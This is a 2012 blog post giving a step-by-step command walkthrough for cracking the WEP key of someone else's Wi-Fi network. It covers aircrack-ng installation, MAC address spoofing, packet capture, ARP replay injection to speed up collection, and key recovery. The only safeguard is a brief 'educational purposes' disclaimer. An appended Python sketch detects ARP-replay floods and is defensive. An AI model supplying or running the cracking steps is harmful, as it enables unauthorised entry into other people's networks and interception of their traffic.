Tuesday, April 17, 2012

Hack a Wi-Fi Network’s WEP Password with Linux

I started my internship program this month, so I don't have much time to write long articles. So I thought I would show how to crack a Wi-Fi network's WEP password. Again, I must say at the beginning that I show this for educational purposes. So if you hack someone's Wi-Fi network with this, please get their written authorization first. And do it at your own risk :)

This hack only works for WEP passwords, so the victim must be using WEP on their Wi-Fi network. Other authentication methods like WPA or WPA2 are also breakable. There are tools out there to hack WPA2 authentication too, but that takes more time and a longer process than this; I will consider posting an article on that later. So let's see how to do the hack.

To do this hack in the way I am going to describe, you need a Linux operating system. I would recommend Ubuntu. The advantage of Ubuntu is that it is more user-friendly, and the terminal commands I give will work on Ubuntu (commands like apt-get may differ in other Linux distributions). I assume that you are familiar with Linux operating systems. (If you find any difficulty, please ask.)

Below are the steps:
Open a terminal and get superuser (administrator) rights. You can do this with the su command or the sudo bash command.

1. Install Aircrack-ng. (This is the tool used to crack the Wi-Fi. It does not come with Ubuntu, so you have to install it from the terminal. Update Ubuntu with apt-get update before you use this command.)
     apt-get install aircrack-ng

2. Run the following to get a list of your network interfaces.

3. Stop the running wireless interfaces. (We stop the wireless interface so we can change its MAC address.)
     airmon-ng stop (interface)
     ifconfig (interface) down

4. Change the MAC address of the wireless interface. (You can use any MAC address here. We change the MAC address for security reasons; this step is recommended but not essential.)
     macchanger --mac 00:11:22:33:44:55 (interface)

5. Start monitoring the packets.
     airmon-ng start (interface)

6. Dump the packets. (Keep the previous command running and open a new terminal for this command. We have to dump the packets into a file so we can use that file when cracking the password. Channel and BSSID can be taken from the result of the airmon-ng start (interface) command.)
     airodump-ng -c (channel) -b (bssid) -w (file name) (interface)

7. Create traffic. (Keep the previous two terminals running, open a new terminal and use the following command to boost the traffic. This is useful when only one station is communicating with the router. It boosts the traffic so more data is captured.)
     aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

8. Replay attack to speed up the hack. (Open a new terminal for this command. This command also speeds up the hack with ARP requests.)
     aireplay-ng -2 -p 0841 -c (dmac) -b (bssid) (interface)

9. Wait until the Data section exceeds at least 10,000 (the amount of data you need to gather changes according to the size of the WEP key) in the airmon-ng terminal, and then crack the key with the following command.
     aircrack-ng -b (bssid) (file name-01.cap)

After executing this command you will get the WEP password of the victim Wi-Fi network.
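
Steps 7 and 8 boost traffic by replaying ARP requests, which makes one source MAC send ARP requests far faster than any ordinary client, and a network owner can alert on that. The sketch below is an added example, not part of the original post: the log format (`<seconds> <source MAC> <frame kind>`), the sample lines and the threshold are all constructed assumptions standing in for whatever a monitoring sensor on the network records.

```python
from collections import defaultdict, deque

def build_sample():
    """Constructed log lines: '<seconds> <source MAC> <frame kind>'."""
    lines = []
    # Two ordinary clients: an ARP request every few seconds, plus data frames.
    for i in range(10):
        lines.append(f"{i * 3.0:.3f} aa:bb:cc:00:00:01 arp-request")
        lines.append(f"{i * 3.0 + 0.5:.3f} aa:bb:cc:00:00:02 data")
        lines.append(f"{i * 4.0 + 1.0:.3f} aa:bb:cc:00:00:02 arp-request")
    # One source replaying ARP requests: 300 frames in 1.5 seconds.
    for i in range(300):
        lines.append(f"{12 + i * 0.005:.3f} 00:11:22:33:44:55 arp-request")
    return lines

def parse(line):
    """Split one log line into (timestamp, lower-cased MAC, frame kind)."""
    ts, mac, kind = line.split()
    return float(ts), mac.lower(), kind

def detect_arp_flood(lines, window=1.0, threshold=50):
    """Return {mac: peak ARP requests seen in any `window` seconds} for
    every source whose peak exceeds `threshold` (both values are assumptions
    to tune against the network's normal traffic)."""
    recent = defaultdict(deque)   # mac -> timestamps inside the current window
    peak = defaultdict(int)       # mac -> highest count observed so far
    for ts, mac, kind in sorted(parse(l) for l in lines):
        if kind != "arp-request":
            continue
        q = recent[mac]
        q.append(ts)
        # Drop timestamps that have aged out of the sliding window.
        while ts - q[0] >= window:
            q.popleft()
        peak[mac] = max(peak[mac], len(q))
    return {mac: n for mac, n in peak.items() if n > threshold}

if __name__ == "__main__":
    for mac, n in detect_arp_flood(build_sample()).items():
        print(f"ALERT {mac}: {n} ARP requests within 1s")
```

Because step 4 lets the sender use any MAC address, the flagged address identifies the flood rather than the device behind it; the lasting fix is moving the network off WEP.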

